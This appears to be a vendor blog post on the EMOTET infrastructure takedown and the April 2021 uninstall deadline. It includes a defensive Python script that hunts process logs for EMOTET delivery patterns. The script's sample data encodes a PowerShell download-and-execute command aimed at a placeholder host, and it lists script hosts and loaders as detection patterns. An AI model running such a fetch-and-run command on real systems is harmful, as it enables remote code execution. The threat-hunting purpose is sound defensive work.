The EMOTET group has been around for half a decade and has evolved its footprint in the cybercrime world from operating a banking Trojan to running a lucrative business serving other threat actors. Like other groups of its kind, EMOTET has a mafia-like structure and delivers attacks with a high degree of organization. It has successfully attacked a wide variety of companies worldwide and has regularly made the news headlines. The group is active in the digital underground, where stolen data from its victims can be traded or bought. Beyond that, it also sells access to its victims' compromised networks to other cybercriminals. It is therefore not surprising to see other malware families or follow-on attacks delivered to organizations already compromised via EMOTET, since this is exactly what the malware-as-a-service / crime-as-a-service business model is for. For example, EMOTET has lately been associated with other threats including the TRICKBOT and RYUK malware, the latter being one of the most notorious ransomware families.
Below is a typical infection chain involving the delivery of EMOTET:
What the authorities of eight countries have achieved, coordinated by EUROPOL and EUROJUST, deserves to be highly valued and celebrated accordingly. Successful international coordination of this kind cannot be taken for granted, and it shows that those authorities can be quite effective against cybercriminals. Having taken over EMOTET's IT infrastructure, this coordinated effort will certainly interrupt the EMOTET group's activities.
However, this big win does not mean the end of the EMOTET group's activities, and certainly not the end of cybercrime. Without further information on the status of the investigation, it cannot be predicted how decisive it was. Trend Micro is monitoring the situation and will report soon on the impact of this operation. The EMOTET group now faces the same problem as its victims: resilience. One hopes that the group retires or goes silent, or that its members have to hide deeper because investigators may already be knocking at their doors. Either way, the business model has been proven to work and to be very profitable, and unfortunately there is no doubt that, in one way or another, the void left behind will be filled again.
In the meantime, while related cybercrime activity may decrease, it is a good time for organizations to review their security posture and ensure proper countermeasures are in place. This includes improving visibility into suspicious activities that may be indicators of compromise. Trend Micro Vision One may help you achieve this: https://www.trendmicro.com/en_us/business/products/detection-response.html
In addition, having taken over the EMOTET infrastructure, the authorities are able to communicate back to EMOTET-compromised systems. It has been found that an uninstall of the EMOTET 'agents' is to be triggered by the authorities on April 25th, 2021. It is highly recommended that you look for EMOTET-related activity within your environment before this date, so that you can conduct a proper, deeper investigation into what else may have been delivered alongside EMOTET, or what other attacks may have been conducted as a result of the EMOTET compromise. Note that the uninstall removes only the EMOTET component itself: any follow-on malware (such as TRICKBOT or RYUK) that was delivered through it stays in place, while the EMOTET artifacts that would help you trace how it got there will be gone. This task might therefore be considerably more difficult after April 25th, 2021.
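As a starting point for such a hunt, the following is an added example (not Trend Micro tooling and not code from this post). It scans process-creation events exported as JSON lines with Sysmon-style field names (Computer, ParentImage, Image, CommandLine; this export format is an assumption) for the well-documented EMOTET delivery pattern: an Office application spawning a script host, an encoded PowerShell command line, and a loader running a DLL from %LocalAppData%. The heuristics and the sample events are constructed for illustration and are not indicators of compromise taken from this page; treat each hit as a lead for the deeper investigation described above, not as a verdict.

```python
"""Hunt Sysmon-style process-creation events for the typical EMOTET delivery chain."""
import base64
import json
import re
from typing import Optional

# Generic hunting heuristics (assumed here, not an official IOC list):
# Office applications that macro-laden documents open in, and the script
# hosts / loaders those macros typically launch.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
DLL_LOADERS = {"rundll32.exe", "regsvr32.exe"}
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{32,})", re.I)
APPDATA_LOCAL = re.compile(r"\\AppData\\Local\\", re.I)


def basename(path: str) -> str:
    """Lower-case image name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(arg: str) -> Optional[str]:
    """Decode a PowerShell -EncodedCommand blob (base64 of UTF-16LE text)."""
    try:
        return base64.b64decode(arg, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def score_event(ev: dict) -> list:
    """Return the reasons one process-creation event looks like EMOTET delivery."""
    parent = basename(ev.get("ParentImage", ""))
    image = basename(ev.get("Image", ""))
    cmdline = ev.get("CommandLine", "")
    reasons = []
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        reasons.append(f"office-spawns-{image}")
    m = ENCODED_ARG.search(cmdline)
    if image == "powershell.exe" and m:
        decoded = decode_encoded_command(m.group(1))
        reasons.append("encoded-powershell: " + (decoded or "<undecodable>"))
    if image in DLL_LOADERS and APPDATA_LOCAL.search(cmdline):
        reasons.append("loader-runs-dll-from-appdata-local")
    return reasons


def hunt(lines) -> dict:
    """Group suspicious events by host: {host: [(image, reasons), ...]}."""
    hits = {}
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip a malformed export line rather than abort the hunt
        reasons = score_event(ev)
        if reasons:
            hits.setdefault(ev.get("Computer", "?"), []).append(
                (basename(ev.get("Image", "")), reasons))
    return hits


# Constructed sample export (not real telemetry). The encoded command is built
# here so the decoder can be checked against a known plaintext.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/doc')"
    .encode("utf-16le")).decode()

SAMPLE_EVENTS = [
    json.dumps({"Computer": "WS01", "ParentImage": r"C:\Windows\explorer.exe",
                "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                "CommandLine": '"WINWORD.EXE" /n invoice.doc'}),
    json.dumps({"Computer": "WS01",
                "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "CommandLine": "powershell -nop -w hidden -enc " + ENCODED}),
    json.dumps({"Computer": "WS01",
                "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "Image": r"C:\Windows\System32\rundll32.exe",
                "CommandLine": r"rundll32.exe C:\Users\alice\AppData\Local\Temp\abc.dll,Control_RunDLL"}),
    json.dumps({"Computer": "WS02", "ParentImage": r"C:\Windows\System32\services.exe",
                "Image": r"C:\Windows\System32\svchost.exe",
                "CommandLine": "svchost.exe -k netsvcs"}),
    "this line is not JSON",
]

if __name__ == "__main__":
    for host, events in hunt(SAMPLE_EVENTS).items():
        for image, reasons in events:
            print(host, image, reasons)
```

Point `hunt()` at a real export (one JSON object per line) and pivot from each flagged host to what ran afterwards: the script host's children, new services or scheduled tasks, and outbound connections, since those are where TRICKBOT or a ransomware loader would show up.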
Note that the Dutch Police have put a service in place that allows you to check whether data related to a specific email address has been leaked:
If you require any help or support from Trend Micro to go through these tasks, do not hesitate to contact your Trend Micro representative.